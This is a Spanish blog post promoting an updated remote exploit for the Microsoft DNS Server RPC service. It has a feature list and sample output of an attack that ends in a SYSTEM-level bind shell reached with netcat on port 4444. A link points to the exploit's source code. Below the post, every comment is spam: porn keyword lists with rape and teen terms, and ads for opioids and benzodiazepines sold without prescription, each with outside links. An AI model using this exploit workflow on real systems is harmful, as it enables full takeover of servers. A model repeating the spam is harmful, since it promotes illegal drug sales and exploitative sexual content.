Exploit remoto para el servicio DNS de Microsoft (actualizado)

Entre las nuevas funcionalidades tenemos:

- Ataque por defecto al puerto 445 (requiere autenticación)
- Permite seleccionar puertos tcp dinamicos (sin autenticación)
- Identificación automática de puertos rpc dinámicos del dns
- Identificación local y remota de sistema operativo para ajuste de offsets
- Windows 2000 server y Windows 2003 server (Spanish) soportados por defecto
- Solucionados bugs en la shellcode de windows 2003
- Exploit universal en local para windows 2000 (búsqueda automática de opcodes)
- Exploit universal en local y remoto para Windows 2003 (unicode.nls) saltando la protección /GS (pero no DEP)
- Agregado soporte para windows 2000 en ingles e italiano (no verificado)
- Uso de la api de RPC de Microsoft :-)

A continuación se muestra un ejemplo del uso del exploit contra un sistema windows 2000 server:

D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.7
--------------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
--------------------------------------------------------------

[+] Trying to fingerprint target.. (05.00)
[+] Remote Host identified as Windows 2000
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:192.168.1.7
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.7[1028]
[+] Dynamic DNS rpc port found (1028)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.7[1028]
[+] RpcBindingFromStringBinding success
[+] Selected target 0x79467ef8
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444

D:\>nc 192.168.1.7 4444
Microsoft Windows 2000 [Versión 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

El código fuente del exploit y el analisis del mismo lo podes Descargar aqui

Por ultimo agradecer a Mario Ballano por la ayuda brindada en el análisis de la vulnerabilidad y en el desarrollo de la prueba de concepto

Comentarios (11)

	1. 06-05-2009 06:15
	list of free porn sites username and passwords for porn r8dB e5DS Ice American Gladiators Nude Pics, free psp mp4 porn downloads 5Xy qYw The Slums Of Beverly Hills Nude, funny adult porn EMx fKdf Early Teen Model Portfolios Nude, gang rape porn knz Oj1 A J Cook Nude Hot Pictures, porn pics and movies 3LgQ tx6 American Idol Contestant Posing Nude, college boy porn pO6 TrQ College Men Nude Free Galleries, www free porn clips cwE eq4 Nude Photo Of Nancy Sullavin Benoit, free sample black porn 4c3m 6xrs Free Nude Pics Of Kimberly Williams, milf porn 89 Dw4G rXy Nude Pictures Of Ashley Simpson, porn vids for women K1h t5W Celebrity Pics Semi Nude Teen, hot steamy porn 4p5 ygFL Nude Photos Of Handicapped Girls, free latina porn pictures P0g SnSL Maggie Gyllenhaal Nude Sherry Sex Scene, xxx hard core porn videos 2mQ nPrr Nude Women Showing Large Clits, sexy toon porn 4eA YZ49 Vivica A Fox Photo Nude, free online porn vids ATOm Pzj Hot Girls Topless Or Nude, sample porn video clips Mq6S kSw Nude Beautiful Girl In Nigeria, brianna banks ducky porn StER gfF Free Nude Emma Watson Wallpaper, get her pregnant porn rbX Kqa Free Very White Alabaster Babes Nude, ebony porn site review mSrX 0Hjy Adult Live Nude Webcams Sex Teen, animal fetish porn hMk 3Or Nude Gay Twink Model Penis, wap porn SXFQ DST Mass Nude Excersise In Japan, korean celebrity porn A3Cz Z8T Dancing With The Stsrs Nude, http://www.woodsey.org.uk/mind/index.php?topic=404.0 Registered Report

Lewis

	2. 12-05-2009 11:11
	girl porn pics porn stars website zqys 1py Chelsea Co Free Nude Video, soft porn clip RRs BA5 How To Run Nude Male, free full length porn mpeg F6zf 31x Free Older Mature Nude Women Galleries, brazilian anal porn cdFx 78yc Olivia Hussey Nude Movie Clips, xxx rape porn RgP7 PXT2 Battle Star Galactica Stars Nude, mom porn galleries xw8 nN6 Nude Asian Girls Young Lovely Free, cartoon porn galleries C1hh DWd Nude Thumbnails Of Indonesian Girls, how to have sex like a porn star ewR6 7mTR High School Girl Nude Sex, celebrity porn paris hilton rE5 zOY Nude Women Dressed As Pirates, download animal porn 7p15 K6W Jennifer Love Hewitt Free Nude Pics, paris hilton tape xfB8 R3B Fine Art Nude Model Iona Lynn, latin milf porn 17TK t5m Rachel Hunter Free Nude Pic, mature latin porn tMYp EAgG The Naked Brothers Band Nude, college porn site 1Sx azXs Jane March The Lover Nude Movie, free porn sites reviews KFAp 2f4 Nude Pictures Of Kiera Knightly, rape porn com 8Zj aZ6B Woman Eroticly Massaging Nude Woman, free midget porn movie wwKr ddK Free Fake Nude Catherine Mackenzie Porn, free asian porn xmLS g57A Nude Photos From Macomb Il, mature interracial porn yqAD WEe Men On Men Or Male Nudes, sexy cartoon porn CNYD HryB Free Hot Nude Housewives Amateur, amatuer porn star cyd CKe3 Moms Bikini Topless Nude Daughter, inuyasha porn pictures 4fOw 1TEY Nude Camp Ground North Carolina, free full length porn sex videos 2xD seh3 Free Photos Beatiful Woman Nude, young porn video B1k1 Wy9 Amateur Nude Spring Break Pictures, http://ainsharkeya.org/montada/index.php?topic=4810.0 Registered Report

Olive

	3. 12-05-2009 18:21
	teen queen tiffany nude trixieteen rapidshare RmE gj4S Nude Girls In Porno Videos, hairstyles for black teen Fy0 QK2 Free New Celeb Nude Pics, japanese teen bukkake GwZ mG2 Nude Jeri Ryan Free Pics, teen titans tokyo 1LyM S4m Hot Young Teen Non Nude Thongs, tiffany teen freeones bulletin 0YSg 7Fh8 My Personal Nude Photo Gallery, teen people cover L5H6 Atx Sorority Embarrassed Nude Females Pics Initiation, russian teen dvd gNM3 9cFL Nude Male Jobs In Detroit, tight teen butthole NaZ7 anWC Nude Photo Of Vanessa Anne Hugdens, aqua teen hunger force the movie quotes OGpD axhL Date Movie Sophie Monk Nude, teen girl bunny R7D DNPp Vanessa Hutchins Nude Video Scandal, raven teen titans hentai 3 rKY Ge3 Free Nude Pictures Of Ice T, teen planet board ckg LyG The Fox Kathy Lee Nude, african american teen websites ZE6X EZfP Nude Pic Of Marry Carrie, miss teen alabama TRrp 7Ec French Swimmer In Nude Pics Controversy, my teen boobs 2r7 ggs Some Girls Movie Patrick Dempsey Nude, http://forum.pro-praxis.net/viewtopic.php?p=3349#3349 Registered Report

Mirabel

	4. 12-05-2009 20:57
	free games of porn hott sexy porn qZyR pE9 Black Nude Male Porn Stars, free porn movie dowloads 21Xe QET Tiffany Teen Nude Pics Movies, free black porn Dbw CjS Cute Girls Free Nude Pictures, best lesbian porn dN7 12r Jennifer Walcott Nude Playboy Pics, top porn site reviews eyk cRge Ashley Judd Free Nude Pics, free black porn movie downloads mwYe WP3 Asian Strippers Nude Picture Gallery, free horse porn vids ThMk Ewr3 Girls Beutiful Sexy Nude Pictures Free, free lesbian porn no membership P5Ks wbC5 Free Gallery Pictures Nude Pornstar Athletic, classic gay porn stars m6q Nsbx Sexy Nude Women Atheletes Naked, hd porn links jkGY P8SO Tila Tequila Free Nude Photos, young porn for free pDN sZCj Nude Pictures Of Amature Irish Girls, free porn for mobile phone YLP xE3 Large Breasts Nude Pictures Share, download free porn 1N39 acKw Nude Web Cams Teen Boys, best free lesbian porn videos nkj 8hbj Baltimore Nude Girls Behind Glass, free anime porn vidios axM2 TDj4 The Art Of Nude Women, good porn pics SW6T Zap Free Nude Hairy Studs For Women, download new release movies tYw2 4Atg Sharon Stone Nude Free Clips, get free passwords to porn sites SdL RDzW Mom And Son Nude Galleries, naruto porn comic BzEz rrs Coco Nicole Austin Nude Videos, direct porn movie QrZ 5EMx Straight Young Men Nude Pics, http://heroclan.nl/index.php?topic=27100.0 Registered Report

Deborah

	5. 13-05-2009 15:13
	weather cam pregnant pissing KMfw Cxb Laura M Olympic Nude Free, free nano x7Xk CBAg Milf Nude Videos For Free, adult entertainment kansas xwwA Q9W Sample Videos Of Tasteful Nude Women, columbia pictures 4Ln fEp6 Olivia Theresa Longott Nude Photos, lesbian foot fetish Zze d7Sw Nude Women And Free Thumbnails, gay men have sex 0mkg xMFn Nude Photos Of Daisy V Heyden, online music downloads rsn2 2h4 Girls Nude For Old Men, free mature porn movies Yr7 Xqn0 B Y Nude Men Photo, www adult sex porn tv com FsQL DEg Big Brother Germany Nude Pics, boy nudes dye X0n International Workshop On Nude Mice, www movies MrFY abF Women Nude Models Portfolio Beach Galleries, trogan condoms QM2C NBtW Free Cellphone Backgrounds Of Nude Women, tila tequila nude 321Y hed Free Nude Pics Of Kiana Tom, nude black women WL1H HQYC Chinese Nude Sex Free Video, jessica simpson breast Kbq wdsw Nude Photos Of Women Breastfeeding, nasty hardcore sex s7q N6x Danielle Radcliffe Nude Equus Photo, trojon condoms Gmtf nMqh Julia Roberts Sexy Nude Photos, asian ladies AqYX qTb Bart Simpson Nude In Movie, http://www.yerbaquebec.com/forum/viewtopic.php?p=113558#113558 Registered Report

Graham

	6. 13-05-2009 19:07
	buy adipex without a perscription price of nose surgery Orqr 79WM generic sumycin, buy ephedra on line s9X s61 purchase cheap rimonabant online, best canadian online pharmacy O9ks rfW7 order generic sumycin online, buy adipex no prescription weGW BXg0 uk order prednisone, united states online pharmacies 8P60 8qk venta de rimonabant, buy clonazepam no prescription M9d c62 order cheap sumycin, buy clomid no prescription AOPf 9X6 cheap prednisone, buy phendimetrazine without a prescription HeH 0SZ vente prednisone, treatment plans and interventions for depression and anxiety disorders Q44n dE1 vente rimonabant, buy oxycodone with no prescription qGhX aCL comprar prednisone, phentermine pharmacy online consultation 8Ab EZr1 generic rimonabant uk, vicodin online no perscription DOZ CwP prednisone españa, buy allegra d online arHG OEM9 sumycin usa, where can i buy cheap phentermine Y28 xZxL prednisone prezzo, vicodin online no prescription wks d8zh buy cheap sumycin, http://thaidvd4u.com/board/index.php?topic=2842.0 Registered Report

Elvira

	7. 14-05-2009 03:12
	9 months pregnant porn women having sex porn 6nS S8LY American Little Nude Girl Picture, naruto porn images ZRw9 QQX Belinda Carlisle Fake Nude Pics, doctor sex porn pwrs Ptqd Nude Lesbians Pics For Free, pokemon porn flash mPm WHe Popbytes Lindsay Lohan Gets Nude, japanese psp porn DGA W6fE Young Rade School Pics Nude, asia carrera porn eskimo sHG jZOX Girl Naked Nude Summer Beach, download full movies d4X XbB Free Nude Sex Pics German, toon porn comics XMw Xx1 Free Nude Pictures Of Courtney Cummz, best asian porn site pq4z dGY Nude Pics Of Jamie Pressly, duckyporn coom r9T tQT Nude College Men Gettin Physicals, young guys porn qHL OCHL Nude Celebrities A To Z Free, porn pictures for free bnB 3fE Women Seniors Nudes Photos Free, vintage porn movie forum 88A Rmf Hijacked Cell Phone Nude Pics, free cartoon porn free qcW SSf Bijou Phillips Nude Hostel Poster, http://inspiring-results.com/phpbb2/viewtopic.php?p=31966#31966 Registered Report

Charley

	8. 14-05-2009 08:01
	where to buy xerisan asa buy real phentermine online hqj NqyD order generic sumycin, buy xanax without prescription B6y 9bY prednisone españa, i want to buy adipex Gz6 0XmB order rimonabant uk, where can i buy hydrocodone online x2M mCK medikament rimonabant, how to purchase hydrocodone QsZF PL8 uk rimonabant generic, buy prescriptions drugs online zhY2 3s1 order prednisone usa, how to buy insulin 9rL chQQ uk sumycin cheap, buy hydrocodone from mexico 8Ddt c1jk uk buy sumycin, buying percocet without a prescription qSTW WGY sumycin canada, buy ativan without a prescription 88h q1b comprar prednisone, where to buy phentermine online PO6 s4E0 vente rimonabant, new zealand online pharmacies 1gZ aE5z generic sumycin, buy tramadol no prescription XfD 2Kba prednisone prezzo, buy adipex online no prescription pE8 rQS sumycin buy, darvocet compared to percocet QKT PrE purchase sumycin, buy vicodin online without a perscription 1q3B 2fB order sumycin online, http://www.fotoextempore.com/forum/index.php?topic=7388.0 Registered Report

Leila

	9. 14-05-2009 19:41
	mexican mail order pharmacy can i buy phentermine online without a prescription w3B 2GSn buy avodart uk, purchase birth control pills wY0 eXpR avodart online order, online pharmacy tech schools XTn aOc0 avodart order, where to buy lithium ion batteries fnWE CKO generic avodart uk, buy bontril on line 2jA gnd prednisone españa, where to buy lithium 56m h6DG online prednisone buy, buy ionamin no prescription d5X ANX prednisone, where to buy proactive yh2j XNN purchase generic avodart, sleep disorders in the elderly LO9 frC online avodart buy, buy alprazolam without prescription 6Pr Hw4 cheap avodart online, greater washington sleep disorders centers NzKp B5hp avodart order online, how to order hydrocodone zpR XSPE purchase avodart online, non prescription online pharmacies NyFx x5DT buy avodart usa, prescription drugs online legal jKyy fSBG buy avodart canada, how to buy percocet zk47 Keb0 prednisone buy online, http://utvforums.org/forum/index.php?topic=17299.0 Registered Report

Antoinette

	10. 15-05-2009 02:17
	buy hydrocodone online no rx buying xanax without prescription sbq HAr avodart order online, where can i order phentermine online WscX SNS3 prednisone buy, buy cheap fioricet online OCf 0N2W buy cheap generic prednisone online, buy hydrocodone online cod xOrq pafY buy avodart canada, where to buy androgel 4nK CER generic avodart online, street prices for vicodin bkSZ Ez6 prednisone order, buy azithromycin without prescription C9t EcT prednisone online, best place to buy phentermine online cESP 2Oc prednisone canada,, where to buy ephedrine RDQ 3mYF avodart buy, people with social anxiety disorder TYzz TML prednisone purchase, how to order xanax online nDt 6ajg uk buy avodart, signs of anxiety disorder H05 fOgq buy generic prednisone, buy percocet with no prescription z63 94An uk order avodart, were to buy potassium nitrate k6z5 mE32 online prednisone, buy tenuate on line AxPY cHK9 buy cheap generic avodart online, can you buy hydrocodone online MSHs HtYA generic prednisone uk, where can i buy percocet online qtR xr6 avodart, where to buy cephalexin 66by nzp8 avodart buy online, buying prescription drugs online t8pY nR6 order cheap avodart, price of prescription drugs 8wTq xqSj purchase cheap avodart online, buy tramadol without prescription 2eWR 7kY avodart order online, http://microfinance.neoversity.com.ph/forums/viewtopic.php?p=7505#7505 Registered Report

Mary